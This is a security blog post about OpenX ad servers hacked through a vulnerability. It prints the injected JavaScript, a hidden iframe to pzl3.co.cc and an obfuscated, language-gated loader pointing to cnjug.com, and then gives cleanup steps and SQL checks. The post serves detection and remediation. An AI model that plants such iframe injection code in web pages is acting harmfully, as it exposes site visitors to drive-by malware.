• OpenX: Iframe Malware

    Online advertisements are a significant source of revenue for many web sites. Even small websites can make money by serving up targeted advertisements to their visitors. A popular piece of software which helps deliver these online advertisements is OpenX. This software displays advertisements and rotates ads on web site pages.

    In the last few months, we have seen a large uptick in the number of sites being hacked due to a vulnerability in the OpenX software. In this article, we provide a description of the problem and show an example which can help administrators find malware injected due to this particular vulnerability.

    Identifying the Malware
    When users visit a site hosting ads via OpenX, a PHP script dynamically creates JavaScript code which is embedded on the web page when ads are displayed to visitors. In cases of infection, malware in the form of a small JavaScript snippet is embedded in this PHP script.

    The server location of the PHP script:

    /www/delivery/ajs.php 
    

    An example of a public URL location of the PHP script:

    http://www.infected-website.com/openx/www/delivery/ajs.php?zoneid=1&cb=27272789103&loc=http%3A//www.infected-site.com/
    

    This specific JavaScript snippet loads an iframe element:

    document.write('<iframe src="http://pzl3.co.cc/stats?counter=3" width=0 height=0></iframe>'); 
    

    This malware is injected onto each page served with an ad, and can usually be located on the very first line of the web page. This can easily be verified by viewing the source of the webpage.

    An example of the dynamic JavaScript which inserts this malware:

    var dc=document; var date_ob=new Date(); dc.cookie='h1=o; path=/;';if(dc.cookie.indexOf('3=llo') 0){
    function clng(str1,str2,str3){var cou=new Array('cn','gt','tn','br','id','bg','pl','be','gp','my','th','iq','ro','ba','pk','tr','dz','ma','re','ae','gf','ru','om','il','gr','vn','kw','ci','sa','do','pt','hr','eg','qa','ro','tw','al','hk','ps','eg','do','lt','dk','jo','pk','ma','pr','mk','dz','ge','hr','gr','bg','ba','pt','si','tn','pl','be','ir','sk','hu','az','bo','by','cr','cz','ec','ee','lk','lv','md','mt','pa','rs','sv','tt','ua','uy');
    for(i=0;i<cou.length;i++){if(str1&&str1.toLowerCase().indexOf(cou[i])!=-1)return true;if(str2&&str2.toLowerCase().indexOf(cou[i])!=-1)return true;if(str3&&str3.toLowerCase().indexOf(cou[i])!=-1)return true;}return false;}
    if(clng(navigator.systemLanguage,navigator.userLanguage,navigator.language)){var run=1;}
    if(typeof run == 'undefined'){dc.writeln("<!–");dc.writeln("var host=' widt'+'h=1 h'+'eight'+'=1 '; var src='src='; var brdr='fra'+'mebor'+'der='+'0';var sc='\"http://cnjug.com/blog/index.php?s=IBB@G\" ';");dc.writeln("document.write(");");dc.writeln("//–>");} var run=1;
    date_ob.setTime(date_ob.getTime()+86400000);dc.cookie='h3=llo; path=/; expires='+date_ob.toGMTString();}
    

    Removing the Malware
    The good news is that upgrading OpenX to the most recent version, or version 2.8.7 and above, resolves the vulnerability.

    A very good guide to securing your OpenX installation can be found on the OpenX Blog.

    Quoting the relevant part of the post:

    First, check the append/prepend fields in the banners and zones table for any malicious code:

    SELECT bannerid, append, prepend FROM banners WHERE append != '' OR prepend != '';
    
SELECT zoneid, append, prepend FROM zones WHERE append != '' OR prepend != '';
    

    If you see anything suspicious on those fields, you should clear those values out.


    Second, check that no unexpected admin users have been created, this query will list the details of all users with admin access in your system:

    SELECT u.user_id, u.contact_name, u.email_address, u.username FROM users AS u, account_user_assoc AS aua WHERE u.user_id=aua.user_id AND aua.account_id = (SELECT value FROM application_variable WHERE name='admin_account_id');
    

    Third, check for infected files on the filesystem:

Installing the latest version of openx will restore all core files, but plugin files (which the installer copies up from the previous version), and files in the www/images folder should be double checked after the upgrade is complete.


    In particular, be on the lookout for base64_decode and/or eval statements in your php files. From the bug notes of “Arbitrary code injected into cache file” at https://developer.openx.org/jira/browse/OX-5950, users have reported some specific php files, but the issue can occur on any of the php files.



    Optional steps you can take to secure your system are:

    Conclusion
    If you need additional support, please see if our services can help and feel free to contact us with any comments or questions.